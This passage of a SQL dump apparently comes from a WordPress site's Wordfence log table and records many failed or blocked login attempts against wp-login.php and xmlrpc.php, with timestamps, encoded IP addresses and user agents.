Network',NULL),(7121,0.000000,1629692549.753972,'\0\0\0\0\0\0\0\0\0\0���wң',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7122,0.000000,1629693360.568661,'\0\0\0\0\0\0\0\0\0\0����l',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7123,0.000000,1629694170.182289,'\0\0\0\0\0\0\0\0\0\0��h�i�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7124,0.000000,1629694989.534912,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7125,0.000000,1629695822.893051,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(7126,0.000000,1629696482.171605,'\0\0\0\0\0\0\0\0\0\0��-]��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7127,0.000000,1629696633.062069,'\0\0\0\0\0\0\0\0\0\0��j4��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(7128,0.000000,1629697057.808236,'\0\0\0\0\0\0\0\0\0\0��g��R',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7129,0.000000,1629697453.209269,'\0\0\0\0\0\0\0\0\0\0���G',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailValidUsername',NULL,NULL),(7130,0.000000,1629697586.499823,'\0\0\0\0\0\0\0\0\0\0���@w�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7131,0.000000,1629698225.202565,'\0\0\0\0\0\0\0\0\0\0���#��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7132,0.000000,1629698278.188625,'\0\0\0\0\0\0\0\0\0\0��gm',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7133,0.000000,1629698898.552904,'\0\0\0\0\0\0\0\0\0\0��^+.',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7134,0.000000,1629699107.281831,'\0\0\0\0\0\0\0\0\0\0��@o~ ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7135,0.000000,1629699587.238931,'\0\0\0\0\0\0\0\0\0\0��o�F',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7136,0.000000,1629699930.147669,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','loginFailValidUsername',NULL,NULL),(7137,0.000000,1629700280.260084,'\0\0\0\0\0\0\0\0\0\0����D',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7138,0.000000,1629700757.894943,'\0\0\0\0\0\0\0\0\0\0����m',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','loginFailValidUsername',NULL,NULL),(7139,0.000000,1629701042.214816,'\0\0\0\0\0\0\0\0\0\0��e�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7140,0.000000,1629701589.878074,'\0\0\0\0\0\0\0\0\0\0��/�=�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7141,0.000000,1629701784.604502,'\0\0\0\0\0\0\0\0\0\0��#�w�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7142,0.000000,1629702428.300351,'\0\0\0\0\0\0\0\0\0\0��:��^',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(7143,0.000000,1629702534.397866,'\0\0\0\0\0\0\0\0\0\0��g/<,',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7144,0.000000,1629702886.018881,'\0\0\0\0\0\0\0\0\0\0���]�S',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailValidUsername',NULL,NULL),(7145,0.000000,1629703359.171032,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7146,0.000000,1629703714.831885,'\0\0\0\0\0\0\0\0\0\0��g1?',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7147,0.000000,1629704174.171827,'\0\0\0\0\0\0\0\0\0\0��%�[',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7148,0.000000,1629704554.929238,'\0\0\0\0\0\0\0\0\0\0���q�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','loginFailValidUsername',NULL,NULL),(7149,0.000000,1629704992.824736,'\0\0\0\0\0\0\0\0\0\0���@w�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7150,0.000000,1629705825.183075,'\0\0\0\0\0\0\0\0\0\0��n-p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7151,0.000000,1629706237.509529,'\0\0\0\0\0\0\0\0\0\0��gm',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailValidUsername',NULL,NULL),(7152,0.000000,1629706693.599753,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7153,0.000000,1629707079.470702,'\0\0\0\0\0\0\0\0\0\0��%�\r�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7154,0.000000,1629707548.720300,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7155,0.000000,1629707922.548905,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7156,0.000000,1629708258.037853,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7157,0.000000,1629708262.493365,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7158,0.000000,1629708263.913873,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7159,0.000000,1629708393.804073,'\0\0\0\0\0\0\0\0\0\0����0',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7160,0.000000,1629708766.476323,'\0\0\0\0\0\0\0\0\0\0���9�8',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7161,0.000000,1629709247.172080,'\0\0\0\0\0\0\0\0\0\0��@�2�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7162,0.000000,1629709613.721822,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7163,0.000000,1629710173.956203,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7164,0.000000,1629711058.532034,'\0\0\0\0\0\0\0\0\0\0����z�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7165,0.000000,1629711317.883821,'\0\0\0\0\0\0\0\0\0\0��e ��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(7166,0.000000,1629711975.272808,'\0\0\0\0\0\0\0\0\0\0��-]��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7167,0.000000,1629712168.718446,'\0\0\0\0\0\0\0\0\0\0��QX4\Z',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','loginFailValidUsername',NULL,NULL),(7168,0.000000,1629713779.990486,'\0\0\0\0\0\0\0\0\0\0��ՈLB',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7169,0.000000,1629714672.441825,'\0\0\0\0\0\0\0\0\0\0��g�k',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7170,0.000000,1629714705.402985,'\0\0\0\0\0\0\0\0\0\0��e ��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailValidUsername',NULL,NULL),(7171,0.000000,1629715547.505577,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7172,0.000000,1629715652.800486,'\0\0\0\0\0\0\0\0\0\0���$',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7173,0.000000,1629716407.946650,'\0\0\0\0\0\0\0\0\0\0���1N',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7174,0.000000,1629716622.108268,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7175,0.000000,1629717270.595216,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(7176,0.000000,1629717532.848561,'\0\0\0\0\0\0\0\0\0\0��2tb',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7177,0.000000,1629718136.408348,'\0\0\0\0\0\0\0\0\0\0��/�=�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7178,0.000000,1629718549.632961,'\0\0\0\0\0\0\0\0\0\0��zrL�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7179,0.000000,1629718997.357610,'\0\0\0\0\0\0\0\0\0\0��Ո]�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','loginFailValidUsername',NULL,NULL),(7180,0.000000,1629719491.355396,'\0\0\0\0\0\0\0\0\0\0����%+',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7181,0.000000,1629719856.560010,'\0\0\0\0\0\0\0\0\0\0����bc',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7182,0.000000,1629720436.942043,'\0\0\0\0\0\0\0\0\0\0��gk�s',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7183,0.000000,1629720727.607990,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7184,0.000000,1629721429.389087,'\0\0\0\0\0\0\0\0\0\0���Ů�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7185,0.000000,1629722369.180544,'\0\0\0\0\0\0\0\0\0\0���,�7',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7186,0.000000,1629722467.714339,'\0\0\0\0\0\0\0\0\0\0���贮',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(7187,0.000000,1629723342.931524,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7188,0.000000,1629723369.624806,'\0\0\0\0\0\0\0\0\0\0��k���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7189,0.000000,1629724216.937110,'\0\0\0\0\0\0\0\0\0\0��j4��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','loginFailValidUsername',NULL,NULL),(7190,0.000000,1629724389.176622,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7191,0.000000,1629725096.375547,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7192,0.000000,1629725320.928727,'\0\0\0\0\0\0\0\0\0\0���b�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7193,0.000000,1629725971.123404,'\0\0\0\0\0\0\0\0\0\0�����q',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(7194,0.000000,1629726357.496499,'\0\0\0\0\0\0\0\0\0\0����t',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7195,0.000000,1629726857.756497,'\0\0\0\0\0\0\0\0\0\0��B��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7196,0.000000,1629727354.917048,'\0\0\0\0\0\0\0\0\0\0���֣%',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7197,0.000000,1629727748.277354,'\0\0\0\0\0\0\0\0\0\0��D��U',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7198,0.000000,1629728370.463487,'\0\0\0\0\0\0\0\0\0\0���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7199,0.000000,1629729381.513702,'\0\0\0\0\0\0\0\0\0\0��4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7200,0.000000,1629730411.938401,'\0\0\0\0\0\0\0\0\0\0��3&P',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7201,0.000000,1629731450.137358,'\0\0\0\0\0\0\0\0\0\0����t',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7202,0.000000,1629731469.289273,'\0\0\0\0\0\0\0\0\0\0��6&I�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailValidUsername',NULL,NULL),(7203,0.000000,1629732484.107254,'\0\0\0\0\0\0\0\0\0\0��k���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7204,0.000000,1629733122.721166,'\0\0\0\0\0\0\0\0\0\0��-�A*',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7205,0.000000,1629733550.470163,'\0\0\0\0\0\0\0\0\0\0����`�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7206,0.000000,1629734786.941047,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7207,0.000000,1629736434.654810,'\0\0\0\0\0\0\0\0\0\0���n��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7208,0.000000,1629739624.737649,'\0\0\0\0\0\0\0\0\0\0��D�\\*',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7209,0.000000,1629741216.825718,'\0\0\0\0\0\0\0\0\0\0��.��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7210,0.000000,1629742848.072453,'\0\0\0\0\0\0\0\0\0\0���wң',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7211,0.000000,1629746017.206001,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7212,0.000000,1629747593.221424,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 